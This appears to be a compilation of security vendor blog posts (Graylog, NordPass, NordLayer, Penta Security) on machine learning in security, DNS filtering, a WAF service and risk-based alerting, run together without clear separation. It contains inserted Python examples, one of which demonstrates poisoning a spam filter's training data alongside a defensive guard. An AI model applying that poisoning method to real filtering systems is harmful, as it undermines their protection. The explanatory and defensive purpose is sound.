At Graylog, our vision is a secure digital world where organizations of all sizes can effectively guard against cyber threats. We’re committed to turning this vision into reality by providing Threat Detection & Response that sets the standard for excellence. Our cloud-native architecture delivers SIEM, API Security, and Enterprise Log Management solutions that are not just efficient and effective—whether hosted by us, on-premises, or in your cloud—but also deliver a fantastic Analyst Experience at the lowest total cost of ownership. We aim to equip security analysts with the best tools for the job, empowering every organization to stand resilient in the ever-evolving cybersecurity landscape.

The role of machine learning in cybersecurity

So, does that mean IT teams will become redundant soon, as AI-based security tools can do it all? Simply put, no. But for a more in-depth answer, we’ll need to first understand what machine learning in cybersecurity is and what this technology holds for businesses in the future.

What is machine learning?

Machine learning refers to the ability of algorithms to learn patterns from existing data and use this knowledge to predict outcomes on new, previously unknown data without explicitly being programmed. The more information you feed to the machine learning engine, the more data it can analyze and, consequently, become more accurate.

But what does it mean to say that a machine is learning from the existing data? While traditional programming performs simple and predictable tasks by strictly following detailed instructions, machine learning allows the computer to teach itself through experience. In other words, it mimics human behavior in how to solve problems.

However, self-improvement is not the only reason machine learning models have become so widespread. The sheer volume of information that businesses in every industry now have to manage has become too vast for humans to handle alone. As a result, companies rely on machine learning to process that data and quickly generate actionable insights.

For instance, an ML technique called a decision tree solves classification problems by applying a sequence of conditions (rules) to an input and following the matching branch to a decision. This particular technique is widely used in fintech (for loan approval and credit scoring) and in marketing.

Machine learning solutions are also helpful for businesses in harvesting, organizing, and analyzing large volumes of customer data. This can include purchasing history or individual customer’s typical behavior, such as online browsing habits. With such analyzed data, companies can then recommend relevant products tailored to their customers’ preferences. Think Netflix: With an ML-driven model, it examines its users’ histories on the platform to compile appropriate content recommendations for them to choose from. This increases the time users spend watching Netflix content and their overall satisfaction. Similarly, ML models pick up information relevant to the unique user on the Facebook feed and even moderate content on Instagram.

Machine learning can also boost a company’s cybersecurity by detecting and responding to threats faster than human analysts. This has led to the term “machine learning security,” which, while still a bit niche, describes how ML is used for security tasks like spotting malware or unusual network activity. With its ability to handle massive amounts of data, machine learning has become a key tool for keeping systems safe.

In addition, in most customer support self-service tools, users usually interact with a machine rather than a fellow human being. Such chatbots can answer basic questions and guide a person to relevant content on the website.

Lastly, even in the medical field, machine learning plays a huge role. These models can be trained to examine medical images or other information and then search for illness characteristics.

The importance of data quality in machine learning security

To get the most out of machine learning, you need to give it high-quality data. Think of it this way: ML can only analyze and learn from what you put into it, so if the data’s flawed, the insights will be too. This is especially critical for companies using ML to support decision making. Without quality data, ML models may lead to misguided decisions.

Alongside accuracy, protecting the data itself is part of data quality. Sensitive information should be minimized, prepared, and access-controlled before it is fed into ML models, because training sets and the platforms that hold them are themselves attack surface: a model or platform that is not managed carefully can expose the data it was trained on. In short, quality data should be both precise and secure.

Four types of machine learning

Machine learning traditionally has four broad subcategories that are defined by how the machine learns:

  • Supervised machine learning relies on a “teacher”: the model is trained on data sets that humans have labeled with the correct answer, and it becomes more accurate as it sees more labeled examples. For instance, if you want to teach an algorithm to identify cats, you feed it pictures of cats and of other things, each labeled by a human.

  • Unsupervised machine learning looks for patterns and common elements in data. In turn, such machine learning can find similarities and trends that humans aren’t explicitly looking for.

  • Semi-supervised machine learning falls somewhere between supervised and unsupervised learning. In this case, the model is trained on a small amount of labeled data and lots of unlabeled data. Such a way of learning is beneficial when there’s a lot of unlabeled data, and it’s too difficult (or expensive) to label it all.

  • Reinforcement machine learning is where an algorithm learns a task by interacting with a dynamic environment. It is rewarded for correct actions, which it strives to maximize, and penalized for incorrect ones. It is less common in production security tooling than the supervised and unsupervised approaches, but it has been applied to problems such as adaptive intrusion detection.


Machine learning use cases in cybersecurity

As cybersecurity is a truly fast-paced environment where threats, technologies, and regulations constantly evolve, it’s the agility of machine learning that comes in handy.

ML-powered models can process massive amounts of data and, therefore, rapidly surface critical incidents. This lets organizations detect threats like malware, policy violations, or insider activity by continuously monitoring the network for anomalies: ML-driven algorithms learn to identify new malicious files or behavior from the attributes and behaviors of previously detected malware, rather than from an exact signature match.

In addition, machine learning is a proven method for filtering unsolicited, unwanted, and malicious spam out of a company’s inboxes, including messages carrying pernicious attachments such as malware or ransomware. For instance, the machine learning model used by Gmail not only sifts through spam but also derives new rules from what it has learned in the past. ML methods, coupled with natural language processing techniques, can also detect phishing domains by picking up on the characteristics (length, digit and hyphen patterns, brand look-alikes) that distinguish them from legitimate domains.

Last but not least, machine learning can significantly support online fraud detection and prevention. Using ML algorithms, companies can identify suspicious activity in transactional data: the models are trained to recognize normal payment behavior and flag deviations from it. When paired with a retraining pipeline, ML-driven engines can also keep up as cybercriminals change tactics, because they are periodically refit on recent data and learn the new fraud pattern.

These examples illustrate just a few use cases of machine learning in cybersecurity. But there are many others, such as vulnerability management, that can greatly impact business cybersecurity.

So, is it AI, machine learning, or deep learning?

Frequently, these terms – artificial intelligence (AI), machine learning (ML), and deep learning (DL) – are used interchangeably. We already defined machine learning, so now, let’s see how it relates to artificial intelligence and deep learning.

Artificial intelligence, in the broadest sense, is a set of technologies that enable computers to perform various advanced tasks in a way similar to how humans solve problems. This makes machine learning a subfield of artificial intelligence.

In turn, deep learning is a subset of machine learning. It loosely mimics the structure and function of the human brain: such systems use artificial neural networks built from layers of interconnected units (neurons, also referred to as nodes). Deep learning models of this kind underpin applications such as chatbots and the perception systems of autonomous vehicles.

Machine learning, artificial intelligence, and deep learning in cybersecurity

Even though machine learning brings some challenges when applied to cybersecurity (for instance, the difficulty in collecting large amounts of certain malware samples for the ML machine to learn from), it remains the most common approach and term used to describe AI applications in this industry.

In cases where shallow (traditional) machine learning falls short, deep learning should be used. Examples include highly complex data such as images and unstructured text, or problems where temporal dependencies in the data have to be taken into account.


The future of machine learning in cybersecurity

In the current AI tool-filled climate, it’s easy to see how this technology can become better at specific tasks than humans are. Luckily (or not), machine learning is not a panacea for all things cybersecurity. However, it provides, and will continue to provide, a great deal of support to cybersecurity and IT teams by taking load off their shoulders.

Since many devices (like phones and laptops) connect to the company’s networks daily, it is almost impossible for IT teams to monitor every single gadget. With AI-powered device profiling, you can improve the fingerprinting of endpoint devices and better understand the type and quantity of endpoints connecting to your network. This will help you create effective segmentation rules and stop unwanted devices (potentially including bad actors) from connecting.

Also, employing machine learning can improve your cybersecurity game by helping your IT team develop policy recommendations for security devices such as firewalls. In this case, machine learning learns what devices are connected to the network and what constitutes normal device behavior. In turn, ML-powered systems can make specific suggestions automatically — instead of your team manually navigating different conflicting access control lists for each device and network segment.

And so, integrating artificial intelligence in security, particularly through machine learning, can significantly enhance how your cybersecurity framework adapts to the evolving IT landscape. With more devices and threats coming online daily, the human resources available to tackle them are becoming scarce. In such an environment, machine learning can step in by helping sort out various complicated cybersecurity situations and scenarios at scale while maintaining constant surveillance 24/7.

Challenges of Machine Learning in Cybersecurity

Just like in life, the things that bring us the most value come with their own set of challenges. After all, you can’t expect great results without putting in some effort. The same goes for using machine learning in cybersecurity. It can be incredibly powerful, but getting the most out of it requires navigating a few obstacles along the way. So, here are a few challenges you might face when applying ML to data security:

  • Adaptation to threats: Cyber threats are becoming increasingly intricate and complex, so ML models need continuous retraining on fresh data to keep identifying new attack patterns. This ongoing adaptation is essential if ML security systems are to remain capable of countering the latest tactics employed by attackers.

  • Adversarial attacks: Attackers can target the model itself in two ways. In a poisoning attack they inject deceptive or mislabeled data into the training set (for example, through abused “not spam” feedback), so the retrained model learns the wrong boundary. In an evasion attack they craft inputs at inference time that look benign to the model while remaining malicious. Either way, the model’s effectiveness is compromised, reducing system reliability and making it harder to accurately identify malicious activity.

  • Operational issues: Integrating machine learning into an established cybersecurity framework isn’t always straightforward. There are a few challenges to consider, like the complexity of the implementation process, the risk of false positives that can add to analysts’ workloads, regulatory compliance requirements, and the limited availability of professionals skilled in both ML and cybersecurity.
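The spam-filtering use case described earlier and the poisoning risk in the list above, as an added example rather than NordPass code: the Python below trains a small multinomial Naive Bayes filter (a supervised learner) on constructed ham and spam messages, shows that four spam-like messages mislabeled as ham are enough to make a phishing message pass, and includes a simple guard that flags feedback the current model contradicts by a wide margin. All messages, the smoothing constant, and the review margin are assumptions made for the example.

```python
"""Supervised spam filtering with multinomial Naive Bayes, plus a training-data
poisoning demonstration. Added example, not NordPass code. All messages below
are constructed for the example.
"""
import math
import re
from collections import Counter

TOKEN_RE = re.compile(r"[a-z0-9$]+")


def tokenize(text):
    """Lower-case word tokens; punctuation is dropped."""
    return TOKEN_RE.findall(text.lower())


class NaiveBayesFilter:
    """Learns P(label) and P(token | label) from labelled examples."""

    def __init__(self, alpha=1.0):
        self.alpha = alpha  # Laplace smoothing: unseen tokens never zero out a class
        self.doc_counts = Counter()
        self.token_counts = {}
        self.vocab = set()

    def train(self, examples):
        for text, label in examples:
            self.doc_counts[label] += 1
            counts = self.token_counts.setdefault(label, Counter())
            for tok in tokenize(text):
                counts[tok] += 1
                self.vocab.add(tok)
        return self

    def log_scores(self, text):
        """Log-posterior (up to a constant) of each label for the message."""
        total = sum(self.doc_counts.values())
        scores = {}
        for label, n_docs in self.doc_counts.items():
            counts = self.token_counts[label]
            denom = sum(counts.values()) + self.alpha * len(self.vocab)
            score = math.log(n_docs / total)
            for tok in tokenize(text):
                score += math.log((counts[tok] + self.alpha) / denom)
            scores[label] = score
        return scores

    def classify(self, text):
        scores = self.log_scores(text)
        return max(scores, key=scores.get)


# Constructed training set: four ham and four spam messages.
CLEAN_TRAINING = [
    ("meeting moved to 3pm, please update the calendar invite", "ham"),
    ("attached is the quarterly report for review", "ham"),
    ("can you review my pull request before the release", "ham"),
    ("lunch tomorrow with the platform team", "ham"),
    ("congratulations you won a free prize, claim now", "spam"),
    ("urgent: verify your account password now, click here", "spam"),
    ("free money winner, claim your prize today", "spam"),
    ("click here to claim free bitcoin now", "spam"),
]

# Poisoned feedback (constructed): an attacker who can influence the "not spam"
# signal submits spam-like text labelled ham so the retrained model unlearns it.
POISONED_FEEDBACK = [
    ("claim your free prize now, click here urgent", "ham"),
    ("urgent claim your free prize, click here now", "ham"),
    ("click here now, claim your free prize urgent", "ham"),
    ("your free prize: claim now, click here, urgent", "ham"),
]

PHISH = "urgent: claim your free prize now, click here"


def build_clean_filter():
    return NaiveBayesFilter().train(CLEAN_TRAINING)


def build_poisoned_filter():
    return NaiveBayesFilter().train(CLEAN_TRAINING + POISONED_FEEDBACK)


def feedback_conflict(model, text, label, margin=5.0):
    """Poisoning guard: flag feedback whose label the current model rejects by
    more than `margin` nats, so it is queued for review instead of retraining."""
    scores = model.log_scores(text)
    best = max(scores, key=scores.get)
    return best != label and scores[best] - scores[label] > margin


if __name__ == "__main__":
    clean, poisoned = build_clean_filter(), build_poisoned_filter()
    print("clean model   :", clean.classify(PHISH))      # spam
    print("poisoned model:", poisoned.classify(PHISH))   # ham
    for text, label in POISONED_FEEDBACK:
        print("flagged" if feedback_conflict(clean, text, label) else "accepted", text)
```

The guard is deliberately simple: it does not stop an attacker who poisons slowly enough to stay under the margin, which is why production pipelines also hold feedback for human review, retrain from a frozen, audited corpus, and track classification drift between model versions.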

How does NordPass use machine learning?

Machine learning offers a wide range of applications for businesses, from applying it to cybersecurity to simply enhancing customer satisfaction. With artificial intelligence still making headlines, we’re likely to see even more use cases in the future. However, machine learning in IT security will be one of the key areas that will continue to evolve.

NordPass is one of the companies that use machine learning. We do so to offer more accuracy and convenience for our customers. Our autofill engine relies heavily on machine learning to accurately categorize the field it needs to fill in on a website or app, whether that is a sign-up, credit card, or personal information form. Remember those artificial neural networks? The engine was trained using exactly those.

If you’re interested in improving your IT team’s online experience and enhancing overall company security, explore what enterprise password management can offer your company.

About NordPass
NordPass is developed by Nord Security, a company leading the global market of cybersecurity products.

The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.


How to choose the best DNS filtering solution for your business

Summary: Discover key factors for selecting a DNS filtering solution that enhances network security, boosts productivity, and ensures compliance for your business.

Today, businesses face many online threats that can jeopardize network security, reduce employee productivity, and compromise regulatory compliance. Domain Name System (DNS) filtering is a powerful tool for protecting against these threats by blocking access to harmful websites, such as those that host malware, phishing attempts, or inappropriate content.

Beyond protecting your network, DNS filtering tools improve workplace productivity by limiting access to non-work-related websites. They also help ensure compliance by restricting access to certain types of content.

However, with many DNS filtering providers available, selecting the right one can be overwhelming. This guide will walk you through the key factors to consider when choosing the best DNS filtering solution for your organization.

How DNS filtering solutions work

DNS filtering is like a gatekeeper for internet usage, preventing access to malicious or inappropriate websites before they can harm your network. By intercepting DNS queries—requests users make when accessing a website—the filtering system determines whether the requested domain is safe based on predefined security policies.

Typically, DNS servers function like an internet “phonebook,” translating domain names into IP addresses to connect your browser and the required website.

With a DNS filtering solution in place, however, each query undergoes additional checks. If the requested site is flagged on a blocklist or is identified as a security risk, the DNS resolver blocks the request, preventing the page from loading and neutralizing potential cyber threats.
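The decision step described above, as an added example that is not NordLayer code: the Python below is the policy engine of a filtering resolver. It normalizes the queried name, walks up its parent domains so that a block on a domain also covers every subdomain, checks an explicit allowlist first, then a blocklist and a category feed, and returns a sinkhole answer for blocked names. The category database, policy, domain names and sinkhole address are all constructed for the example.

```python
"""Policy engine for a DNS filtering resolver: decide per query name whether to
resolve normally or block. Added example, not NordLayer code; the category feed,
policy and sinkhole address below are constructed.
"""
from dataclasses import dataclass, field

# Constructed category feed: domain -> category. Real products use feeds with
# millions of entries; the matching logic is the same.
CATEGORY_DB = {
    "malware-c2.example": "malware",
    "login-verify.example": "phishing",
    "streaming.example": "streaming",
    "casino.example": "gambling",
}

SINKHOLE_IP = "0.0.0.0"  # constructed; many deployments answer with a block-page address instead


@dataclass
class Policy:
    blocked_categories: set = field(default_factory=set)
    blocked_domains: set = field(default_factory=set)
    allowed_domains: set = field(default_factory=set)  # explicit override, checked first


def normalize(qname):
    """DNS names are case-insensitive and may carry a trailing dot."""
    return qname.rstrip(".").lower()


def parent_chain(name):
    """'a.b.example' -> ['a.b.example', 'b.example', 'example'].
    A block on a domain must cover its subdomains, or attackers just add a label."""
    labels = name.split(".")
    return [".".join(labels[i:]) for i in range(len(labels))]


def evaluate(qname, policy, categories=CATEGORY_DB):
    """Return (action, reason); action is 'resolve' or 'block'."""
    chain = parent_chain(normalize(qname))
    for candidate in chain:
        if candidate in policy.allowed_domains:
            return "resolve", f"allowlisted via {candidate}"
    for candidate in chain:
        if candidate in policy.blocked_domains:
            return "block", f"blocklisted via {candidate}"
        category = categories.get(candidate)
        if category in policy.blocked_categories:
            return "block", f"category {category} via {candidate}"
    return "resolve", "no policy match"


def answer(qname, policy):
    """What the resolver does with the query: forward it upstream, or answer
    with the sinkhole address so the page never loads. Both outcomes are logged."""
    action, reason = evaluate(qname, policy)
    record = {"qname": normalize(qname), "action": action, "reason": reason}
    record["answer"] = SINKHOLE_IP if action == "block" else None
    return record


if __name__ == "__main__":
    policy = Policy(
        blocked_categories={"malware", "phishing", "gambling"},
        blocked_domains={"bad.example"},
        allowed_domains={"partner.casino.example"},
    )
    for q in ["WWW.Malware-C2.example.", "cdn.bad.example", "partner.casino.example",
              "casino.example", "streaming.example", "intranet.corp.example"]:
        print(answer(q, policy))
```

Two caveats a practitioner should keep in mind: an allowlist entry overrides blocks for everything beneath it, so never allowlist a name broader than you mean to (allowlisting “example” here would disable the whole policy); and the engine only sees queries that reach it, so hosts with a hard-coded public resolver or a browser using DNS over HTTPS bypass it unless outbound DNS to anything but the filtering resolver is also blocked at the network edge.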

Benefits of implementing a DNS filtering solution

Deploying a DNS filtering solution offers a range of benefits that go beyond basic Internet browsing controls:

Internet threat prevention

Each organization should control employee online traffic. By blocking access to sites known to host malware, phishing, or ransomware, DNS filtering solutions stop many web-delivered attacks before they ever reach a device, since the connection is refused at name resolution.

Keeping productivity on point

Let’s face it—distractions are everywhere. DNS filtering tools help minimize those distractions by blocking non-work-related sites so your team can stay focused and get more done.

Improved network performance

No more bandwidth hogs. A DNS filtering solution ensures your network runs smoothly and efficiently by limiting heavy streaming or large file downloads.

Security compliance

Worried about regulations? DNS filtering helps you meet industry standards by controlling access to restricted content and protecting your business from potential legal and reputational risks.

Keeping remote workers safe

With more people working remotely, DNS filtering solutions block online threats and secure sensitive data, no matter where your employees log in.

Filtering for safer Internet access

Whether it’s a school, a home, or a workplace, DNS filtering blocks inappropriate or harmful content, providing web filtering for students and employees alike.


5 considerations for choosing the best DNS filtering solution

When it comes to selecting a DNS filtering provider, it’s essential to weigh your options carefully. With so many choices out there, understanding the key factors can help you find the right fit for your organization. Here are some critical considerations to keep in mind:

#1 Technical architecture

The backbone of a solid DNS filtering solution is its technical architecture. You’ve got two main options: cloud-based or on-premise. Cloud-based solutions are super scalable. They make it easier to grow with your business’s security needs. They are also easier to deploy, need less maintenance, and usually come with real-time updates.

On-premise solutions give you more control over your data. This can be a big help if you have strict privacy rules. However, they might require higher initial costs, more time, and greater expertise to maintain.

Another thing to keep in mind is DNS resolution speed—how fast it can process requests and load websites. A provider with a global network will keep things running smoothly with less lag when accessing sites.

#2 Advanced threat detection

In today’s world, you need more than just the basics. Look for a DNS filtering solution that’s equipped with advanced threat detection. Such a solution must monitor network activity in real-time, spotting and blocking threats like malware and phishing before they can mess with your network. As cyber threats keep evolving, having a tool that adapts is a must.

#3 Integration with existing systems

Whatever DNS filtering solution you pick should be compatible with your current system. Make sure it works well with your existing security infrastructure, like your firewall or Security Information and Event Management (SIEM) tools. Some providers even offer API access for easy integration with third-party tools or custom solutions. A smooth integration means less hassle for your IT team and a more seamless security experience.

#4 Granular policy management

DNS filtering by itself restricts access to specific content. Defining rules about who may reach which internal network resources is a different problem, closer to network access control. When selecting a DNS filtering solution, it is therefore worth looking for products that go beyond content restriction and also address network access use cases.

Fine-tuning access with your DNS filtering solution helps boost productivity and security, keeping everyone where they need to be.

#5 Real-time analytics and reporting

Keeping tabs on what’s happening in your network is essential. Make sure your DNS filtering provider offers real-time analytics and reporting so you can spot potential threats, check network activity, and stay compliant. Detailed DNS query logs and custom reports are especially useful for digging into incidents or proving you’re following industry regulations.

Tips for selecting the best DNS filtering solution

  • Check out content control features: Look for customizable filtering options that let you block malware, phishing attempts, adult content, gambling sites, and more. Keeping distractions and risks at bay is key for productivity and compliance.
  • Make sure it has solid security features: Don’t settle for basic protection. Your DNS filtering solution should support encrypted DNS transport (DNS over TLS or DNS over HTTPS) between clients and the resolver, advanced threat detection, and malware protection. These features add extra layers of security, especially while your data is in transit.
  • Go for user-friendly setup and centralized management: Setting up DNS filtering shouldn’t be a headache. Look for something simple to install with centralized management so your IT team can control everything from one spot, enforce policies, and quickly handle any issues.
  • Look for customization options: Every business is different, so you’ll want a solution that lets you fine-tune filtering rules to fit your specific needs. Flexibility is key to keeping security tight without slowing down business activities.

Conclusion

Choosing a DNS filtering solution for your business is critical. It impacts everything from your cybersecurity to productivity and compliance. Take the time to evaluate things like the technical architecture, how the provider handles threats, and how well the solution integrates with your current systems. Opt for providers that offer robust security, real-time reporting, and detailed control over access to make sure you’re getting the best DNS filtering solution possible.

With the right DNS filtering in place, you can protect your network, control online interactions, and create a safer, more productive work environment for your team.

How NordLayer can help

NordLayer offers easy-to-use DNS filtering capabilities to protect your network. With features like DNS filtering by category, Web Protection, and Download Protection, keeping your team safe is simple. Setup is quick, even for non-tech users, and managing security for your whole team is straightforward.

  • DNS filtering by category allows IT admins to block content from over 50 categories. This helps keep your network secure and your team focused.
  • Web Protection automatically blocks access to websites that are flagged as potentially malicious.
  • Download Protection scans every new file download and removes harmful files before they can infect your devices.

These features can work together to prevent risks like malware infections and phishing. But that’s not all. All NordLayer customers get encrypted connections and masked IP addresses. This ensures your internet access is secure, no matter where you are.

Want to learn more? Contact NordLayer’s sales team to see how we can help protect your network.


About Nord Security
The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.

About NordLayer
NordLayer is an adaptive network access security solution for modern businesses – from the world’s most trusted cybersecurity brand, Nord Security.


Penta Security Launches a Cloud Security Provider WAF Managed Service on AWS Marketplace


Penta Security, a leading cyber security company and provider of web application security in the Asia-Pacific region, announced that Penta Security’s Cloudbric WMS has officially launched a usage-based SaaS subscription model on AWS Marketplace in December of 2024.

Cloudbric WMS (WAF Managed Service) is a managed service developed for Cloud Service Provider Web Application Firewalls (CSP WAF), such as AWS WAF.

CSP WAFs are powerful security tools, but because they typically require users to configure the security rules themselves, it can be quite difficult to use them to their full potential.

To address this issue, Penta Security has developed a managed service that optimizes the security rules and provides a dedicated console to monitor the security status for AWS WAF users. When Cloudbric WMS is adopted, the security experts of Penta Security initially analyze the user’s logs and optimize the rules for maximum efficiency fit to the unique environment of the user.

Once the initial security rule optimization process is completed, the user will be provided access to a dedicated console for monitoring and security rule configurations. Through Cloudbric WMS, the user can gain better insight and control of the security rules for their AWS WAF.

The security rules utilized by Cloudbric WMS are based on the security technologies and expertise of Penta Security’s own WAF, WAPPLES, which has protected enterprise web services since 2005 and has recently been validated by a third-party testing firm to have a top-tier detection rate. These security rules are also provided in AWS Marketplace in the form of managed rule groups, which are presets of security rules provided by Independent Software Vendors for AWS WAF.

Taejoon Jung, director of the Planning Division at Penta Security stated, “Cybersecurity is always a difficult subject and an area that requires a certain level of expertise. However, it is our vision to provide an easier solution for security. We expect Cloudbric WMS will boost their AWS WAF experiences simply by subscribing to the service.”

Cloudbric WMS for AWS WAF (PAYG) product is available for subscription in the AWS Marketplace. AWS Marketplace is a curated digital store where users can search, evaluate, purchase, distribute and manage solutions provided by AWS Partners.

About Penta Security
Penta Security takes a holistic approach to cover all the bases for information security. The company has worked and is constantly working to ensure the safety of its customers behind the scenes through the wide range of IT-security offerings. As a result, with its headquarters in Korea, the company has expanded globally as a market share leader in the Asia-Pacific region.

As one of the first to make headway into information security in Korea, Penta Security has developed a wide range of fundamental technologies. Linking science, engineering, and management together to expand our technological capacity, we then make our critical decisions from a technological standpoint.


Leveling Up Security Operations with Risk-Based Alerting

In life, you get a lot of different alerts. Your bank may send emails or texts about normal account activities, like privacy notices, product updates, or account statements. It also sends alerts when someone fraudulently makes a purchase with your credit card. You can ignore most of the normal messages, but you need to pay attention to the fraud alerts. Security is the same way. Since your systems can generate terabytes of data every day, your security tools can fire high volumes of alerts, leaving you overwhelmed.

With risk-based alerts, you can reduce alert fatigue by incorporating additional security information, giving you a way to focus on high-value issues.

What is risk-based monitoring in cybersecurity?

In cybersecurity, a risk-based approach to monitoring means that the organization assesses the business impact and likelihood of an attack against various:

  • People
  • Devices
  • Resources
  • Networks
  • Data


After identifying the people and assets at highest risk, the security team often incorporates threat intelligence to help prioritize monitoring and remediation activities. For example, many security teams take a risk-based approach to vulnerability management by applying security updates to critical assets first.

What is risk-based alerting?

Risk-based alerting (RBA) means that the detection logic incorporates additional attributes to reduce the overall number of alerts generated while enhancing them with meaningful data. 

When security analysts write these alerts, they enrich them with security metadata such as:

  • Exploitability, like an asset’s distance from the public internet
  • Impact, like users with privileged access
  • Likelihood, like incorporating threat intelligence
  • Asset criticality, like databases storing personally identifiable information (PII)


With RBA, security analysts can align their monitoring activities to the organization’s risk assessment more effectively. Further, when security teams have a solution that enables threat hunting, they can proactively use these enhanced rules to detect suspicious activity in their systems. 

What are the benefits of risk-based alerting?

While the frontend process of building risk-based detection rules can take some time, the overall benefits you get from them are worth it. 

Reduced Alert Fatigue

Alert fatigue is a real issue for anyone working in cybersecurity, and the problem has only gotten worse over the last few years. According to research, security teams are overwhelmed with inaccurate or unnecessary alerts, struggling to prioritize and review them effectively with:

  • 59% of respondents saying they receive more than 500 cloud security alerts per day
  • 43% saying more than 40% of their alerts are false positives
  • 56% saying they spend more than 20% of their day reviewing alerts and deciding which ones should be dealt with first
  • 55% saying that critical alerts are being missed


With risk-based alerting, you can correlate multiple events to generate fewer false positives. By reducing the overall number of alerts and making them more valuable, your security team can prioritize their responses better. 


Faster Investigation Times

With fewer alerts and better prioritization capabilities, your security team can investigate incidents faster. With more attributes added to the alert, the security team has a way to focus their investigations. For example, consider this risk-based alert that monitors for people who recently tendered their resignation who make changes to Active Directory:

By linking the organization’s HR information to its Active Directory, the security team has a way to monitor for a specific, high-risk use case more precisely. When the system generates the alert, they also have all the information necessary to investigate the root cause. 
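The following is an added illustration of the ideas above, not Graylog code or a Graylog pipeline rule: a small Python risk-based alerting engine that enriches raw events with the four attributes listed earlier (exploitability, impact, likelihood, asset criticality), joins them against an HR resignation list as in the Active Directory use case, accumulates risk per user or host, and only raises an alert when the total crosses a threshold. Every lookup table, event, score weight and threshold is constructed for the example; the 30-day resignation window and the IP address in the threat-intel list (a TEST-NET documentation address) are assumptions, not values from the page.

```python
"""Toy risk-based alerting (RBA) engine.

Added example, not Graylog's own code. Raw events are enriched with risk
attributes from lookup tables, risk is accumulated per entity, and an alert
is emitted only when the accumulated risk crosses a threshold.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed lookup tables (a SIEM would hold these as dynamic lookup tables).
HR_RESIGNATIONS = {"jdoe": datetime(2024, 5, 1), "bwong": datetime(2024, 1, 15)}  # user -> notice date
PRIVILEGED_USERS = {"jdoe", "svc-backup"}      # impact attribute
INTERNET_EXPOSED = {"web01"}                   # exploitability attribute
CRITICAL_ASSETS = {"db01": "PII database"}     # asset criticality attribute
THREAT_INTEL_IPS = {"203.0.113.7"}             # likelihood attribute (constructed TEST-NET-3 address)

# Base score per raw event type; on its own each event is low value.
BASE_SCORES = {"ad_group_change": 20, "failed_logon": 5, "inbound_connection": 10}

RESIGNATION_WINDOW = timedelta(days=30)  # assumed: resignation only matters for 30 days
ALERT_THRESHOLD = 60                     # assumed: accumulated risk needed to alert


def score_event(event):
    """Return (score, reasons) for one event after enrichment with risk attributes."""
    score = BASE_SCORES.get(event["type"], 0)
    reasons = []
    user, host, src = event.get("user"), event.get("host"), event.get("src_ip")

    # HR join: only count a resignation that is recent, not one from months ago.
    notice = HR_RESIGNATIONS.get(user)
    if notice is not None and timedelta(0) <= event["ts"] - notice <= RESIGNATION_WINDOW:
        score += 45
        reasons.append("user recently resigned (HR lookup)")
    if user in PRIVILEGED_USERS:
        score += 20
        reasons.append("privileged user (impact)")
    if host in INTERNET_EXPOSED:
        score += 15
        reasons.append("internet-exposed host (exploitability)")
    if host in CRITICAL_ASSETS:
        score += 25
        reasons.append(f"critical asset: {CRITICAL_ASSETS[host]} (asset criticality)")
    if src in THREAT_INTEL_IPS:
        score += 30
        reasons.append("source IP on threat-intel list (likelihood)")
    return score, reasons


def risk_based_alerts(events, threshold=ALERT_THRESHOLD):
    """Accumulate risk per entity (user, else host) and return one alert per
    entity whose total reaches the threshold, highest risk first. Each alert
    carries the contributing events and reasons so an analyst can start the
    investigation from the alert itself."""
    totals = defaultdict(int)
    evidence = defaultdict(list)
    for ev in events:
        score, reasons = score_event(ev)
        entity = ev.get("user") or ev.get("host")
        totals[entity] += score
        evidence[entity].append({"event": ev["type"], "score": score, "reasons": reasons})
    alerts = [
        {"entity": entity, "risk": total, "evidence": evidence[entity]}
        for entity, total in totals.items()
        if total >= threshold
    ]
    return sorted(alerts, key=lambda a: a["risk"], reverse=True)


# Constructed sample events: one resigning admin changing an AD group, a burst of
# failed logons, two inbound connections to an exposed host, and an AD change by a
# user whose resignation notice is far outside the window.
T = datetime(2024, 5, 10, 9, 0)
SAMPLE_EVENTS = [
    {"ts": T, "type": "ad_group_change", "user": "jdoe", "host": "dc01", "detail": "added member to Domain Admins"},
    {"ts": T, "type": "failed_logon", "user": "asmith", "host": "ws22"},
    {"ts": T, "type": "failed_logon", "user": "asmith", "host": "ws22"},
    {"ts": T, "type": "failed_logon", "user": "asmith", "host": "ws22"},
    {"ts": T, "type": "inbound_connection", "host": "web01", "src_ip": "203.0.113.7"},
    {"ts": T, "type": "inbound_connection", "host": "web01", "src_ip": "198.51.100.4"},
    {"ts": T, "type": "ad_group_change", "user": "bwong", "host": "dc01", "detail": "added member to Helpdesk"},
]

if __name__ == "__main__":
    alerts = risk_based_alerts(SAMPLE_EVENTS)
    print(f"{len(SAMPLE_EVENTS)} raw events -> {len(alerts)} alerts")
    for a in alerts:
        print(a["entity"], a["risk"], [r for e in a["evidence"] for r in e["reasons"]])
```

Run as written, the seven raw events collapse to two alerts: the resigning privileged user touching Active Directory, and the internet-exposed host contacted by a threat-intel address. The three failed logons and the AD change by the user whose notice is months old stay below the threshold, which is the point of carrying risk attributes into the detection logic rather than alerting on every event.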

Improved Security Metrics

Proving your security program’s effectiveness typically includes the following metrics:

  • Mean Time to Detect (MTTD)
  • Mean Time to Investigate (MTTI)
  • Mean Time to Contain (MTTC)
  • Mean Time to Recover or Mean Time to Remediate (MTTR)


With risk-based alerts, you reduce all of these times, ultimately improving the metrics. You can think of it like a chain reaction. With better detection, security teams work with better information and focus. With fewer overall alerts, analysts can investigate them faster. The faster they can find the incident’s root cause, the sooner they can contain the attacker, remediate the system, and get everything back online. 

Who benefits from risk-based alerts?

Even though risk-based alerts sit under the security function, various people across your organization benefit from them. 

Security Analysts

With better information, your security analysts can do their jobs more effectively and efficiently. Since they’re not spending as much time chasing down false alerts, they can focus their energy on high-impact activities like threat hunting. Further, when security analysts have the tools to do their job well, they’re more likely to stay with the company, reducing employee turnover. 

IT Help Desk

When something goes wrong in your environment, the help desk is the first place users turn. Often, security issues and operational issues mimic one another. For example, a Distributed Denial of Service (DDoS) attack slows down your network, but a network device configuration issue can have the same outcome. With security teams detecting and responding to incidents faster, your IT help desk gets fewer calls. 

Senior Leadership

